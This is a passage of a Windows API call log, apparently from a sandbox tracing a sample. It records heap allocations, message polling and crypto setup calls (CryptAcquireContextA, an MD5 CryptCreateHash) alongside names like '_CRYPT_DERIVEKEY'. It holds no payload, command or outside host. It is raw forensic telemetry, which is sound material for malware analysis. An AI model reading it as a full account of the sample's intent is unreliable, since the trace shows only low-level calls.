dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0242.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0242.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0242.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0242.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0242.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0242.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0242.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0242.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0242.659] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0242.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0242.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0242.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0242.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0242.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.660] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0242.660] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0242.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0242.660] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0242.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0242.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0242.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0242.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0242.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0242.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0242.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0242.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0242.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0242.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0242.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0242.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0242.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0242.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0242.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0242.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0242.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0242.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0242.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0242.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0242.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0242.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0242.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0242.663] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0242.664] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.664] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.664] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0242.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0242.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.664] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0242.664] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0242.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0242.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0242.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.665] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0242.665] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0242.665] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.665] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0242.665] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0242.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0242.665] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.666] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.666] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.666] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.666] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0242.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04188 | out: hHeap=0x970000) returned 1 [0242.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0242.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.666] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0242.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0242.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0242.666] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0242.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04380 | out: hHeap=0x970000) returned 1 [0242.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0242.667] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0242.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0242.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0242.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0242.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0242.667] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0242.667] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0242.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0242.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0242.708] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.708] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04578 | out: hHeap=0x970000) returned 1 [0242.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0242.709] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0242.709] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0242.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0242.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0242.709] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0242.709] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0242.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51178, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0242.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0242.709] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0242.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0242.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0242.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0242.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0242.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0242.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0242.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0242.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0242.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0242.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0242.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0242.710] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0242.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978528 [0242.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0242.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0242.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0242.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0242.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0242.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0242.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0242.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0242.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0242.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0242.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0242.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0242.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0242.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: 